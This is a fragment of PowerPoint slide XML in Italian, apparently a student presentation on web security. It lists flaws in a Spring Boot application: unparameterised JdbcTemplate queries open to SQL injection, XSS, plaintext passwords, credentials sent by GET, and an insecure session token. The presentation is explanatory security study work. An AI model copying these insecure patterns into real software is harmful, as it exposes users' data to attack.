        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3625693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71</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="87631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72</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3418159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74</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3293008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75</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34910437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76</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="824601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77</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29936395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78</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1985068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79</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3832252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80</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4284865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81</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="307873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34</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3375734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82</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3626614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83</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="248021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84</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19229492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86</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2464048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87</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3289259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88</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11347214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89</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5645054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91</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1610002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36</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3505271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37</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="316627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38</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="356373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dirty="0"/>
            </a:br>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto numero diapositiva 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FC18A5AB-166C-7943-B0D2-3D0FC34FDC32}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1500261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7/8/24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‹N›</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664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7/8/24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74176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7/8/24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13123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7/8/24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2743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7/8/24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6611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7/8/24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444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7/8/24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231897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7/8/24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85405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7/8/24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3374537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7/8/24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1099811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7/8/24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‹N›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="695413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7/8/24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‹N›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="320378902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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30C24AA2-7C51-ADCC-16FC-1B24D404338F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="1108" r="-1" b="-1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="20" y="10"/>
            <a:ext cx="8668492" cy="6857990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 1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80380FEA-BBFF-6E88-EE0E-1D3475ABEB84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7848600" y="1122363"/>
            <a:ext cx="4023360" cy="3204134"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4100" dirty="0"/>
              <a:t>WEB SECURITY</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="4100" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="it-IT" sz="4100" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="it-IT" sz="4100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13"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asellaDiTesto 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B9E1AFF-C2DB-B881-2069-8E56485B8893}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7228703" y="3175686"/>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530784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Vulnerabilità del sistema</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algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Assenza di input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>validation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> e sanitizzazione</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Cross-Site Scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Salvataggio delle password in chiaro</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Login e registrazioni sono effettuati mediante metodo GET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Token di sessione implementato in modo non sicuro</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="196232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normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Assenza di validità degli input e sanificazione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Autofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Senza una corretta validazione e sanitizzazione degli input, il sistema è vulnerabile a vari tipi di attacchi, come SQL injection e Cross-Site Scripting (XSS). </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Gli attaccanti possono sfruttare questa debolezza per inserire dati malevoli che possono compromettere la sicurezza e l'integrità del sistema. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2000" b="0" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2000" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2164129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SQL INJECTION</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Per permettere l’interazione dell’applicazione Spring Boot con il database relazionale SQL è stato utilizzato </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>JDBC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> (Java Database Connectivity).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>JDBC è una API in Java, che fornisce </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>un set di classi e metodi per eseguire operazioni di accesso ai dati, come l'esecuzione di query SQL, l'inserimento, l'aggiornamento o la cancellazione di record e la gestione delle transazioni.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="1" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>JdbcTemplate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> è una classe fornita da Spring che semplifica l'utilizzo di JDBC per l'accesso ai database relazionali, fornendo un'interfaccia più semplice e facilitando le operazioni di accesso ai dati attraverso JDBC.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2775803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SQL INJECTION</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In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="1" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>application.properties</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="1" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>sono state specificate le informazioni necessarie per stabilire la connessione al database MySQL utilizzando l'interfaccia JDBC.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Immagine 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D692558-272B-1019-8B82-7A72712E7C22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209800" y="3863157"/>
            <a:ext cx="7772400" cy="923910"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="409497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SQL INJECTION</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err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>JdbcTemplate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> è stato utilizzando con query non parametrizzate.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Immagine 4" descr="Immagine che contiene testo, schermata&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04E811CF-1449-422D-E1C2-3C02D01A9404}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2313432" y="3187883"/>
            <a:ext cx="7772400" cy="2866928"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="171057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Password storage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La password viene memorizzata in chiaro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, esattamente come è stata inserita dall'utente, senza alcuna forma di crittografia o hash.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Immagine 4" descr="Immagine che contiene testo, schermata&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C09AB65-AF5C-165C-FBB2-DF60EF9542B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2712983" y="3429000"/>
            <a:ext cx="6766034" cy="2509380"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rettangolo 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B51B9C22-9920-3A1C-A29B-E586D2FCBFDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4417695" y="4566284"/>
            <a:ext cx="971550" cy="20574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noFill/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rettangolo 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{544C2D7C-D9AA-F3BB-60EF-974049D34A4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4430268" y="4580323"/>
            <a:ext cx="971550" cy="2057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FF00"/>
                </a:solidFill>
              </a:ln>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="192140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Login e Registrazione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Sia il login che la registrazione di un nuovo utente vengono effettuati utilizzando il metodo GET, per quanto riguarda il login, verranno inviato nella query dell’URL le credenziali di accesso: email e password in chiaro.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Immagine 4" descr="Immagine che contiene testo, schermata, software, Software multimediale&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37C618B8-FEB7-7EC5-B604-432794AB9EBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3005018" y="3336093"/>
            <a:ext cx="5853676" cy="2704910"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="767719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Login e Registrazione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Per la registrazione oltre a email e password, verranno passati nella query dell’URL anche gli altri dati sensibile dell’utente.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Immagine 6" descr="Immagine che contiene testo, software, Software multimediale, schermata&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DB47D69-C9D3-0D5C-4279-86CDF28F6C38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209800" y="3429000"/>
            <a:ext cx="7772400" cy="2382190"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3983167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Token di sessione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L’applicazione prevede un token di sessione implementato in modo non sicuro.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
